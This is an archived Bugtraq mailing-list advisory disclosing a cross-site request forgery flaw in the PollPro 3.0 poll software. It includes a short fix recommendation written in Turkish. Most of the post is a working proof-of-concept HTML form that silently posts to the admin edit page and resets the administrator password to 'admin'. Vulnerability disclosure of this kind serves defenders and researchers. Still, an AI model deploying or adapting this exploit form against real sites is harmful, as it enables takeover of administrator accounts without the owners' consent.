PollPro 3.0 XSRF VuLn.

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PollPro 3.0 XSRF VuLn.
From: b4DchiLd@xxxxxxx
Date: 3 Jan 2009 22:02:59 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

< ------------------- header data start ------------------- >

#############################################################

# Application Name     : PollPro

# Vulnerable Type     : XSRF

# Infection          : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice     : Form&#8217;a Oturum Key&#8217;i (Session Token) 
eklenmeli, eski &#351;ifre sorulmal&#305;d&#305;r.

# author          : The_0nur-n0x

#############################################################

< ------------------- header data end of ------------------- >
<tr>
<th0x>
        <td>
          <br />
          <form action="http://Site.net/PATH/admin/agent_edit.asp?ID=USERID"; 
name="frm" method="post" onSubmit="return Th30nur()">
                <table cellpadding="2" cellspacing="0" border="0" 
align="center"><tr>
                        <td>Username:</td>
                        <td><input style="width: 400px;" type="Text" 
disabled="disabled" name="username" value="admin" size="45" maxlength="25" 
class="textbox" /></td>
                </tr><tr>
                        <td>Password:</td>
                        <td><input style="width: 400px;" type="Password" 
name="password" size="45" value="admin" maxlength="25" class="textbox" /></td>
                </tr><tr>
                        <td>Name:</td>
                        <td><input style="width: 400px;" type="Text" 
name="name" size="45" value="Admin User" maxlength="80" class="textbox" /></td>
                </tr><tr>
                        <td>Enabled:</td>
                        <td><input type="Checkbox" name="enable" checked 
value="1" /></td>
                </tr><tr>
                        <td colspan="2" align="right"><br /><input 
type="Submit" value="Update" /></td>
                </tr></table>
                <input type="Hidden" name="mode" value="edit" />
          </form>
          <br />
        </td>
    </tr></table></th0x>

Prev by Date: Top 5-ish Threats to Watch for in 2009
Next by Date: Call for papers and trainers - SeacureIT 2009
Previous by thread: Top 5-ish Threats to Watch for in 2009
Next by thread: Call for papers and trainers - SeacureIT 2009
Index(es):
- Date
- Thread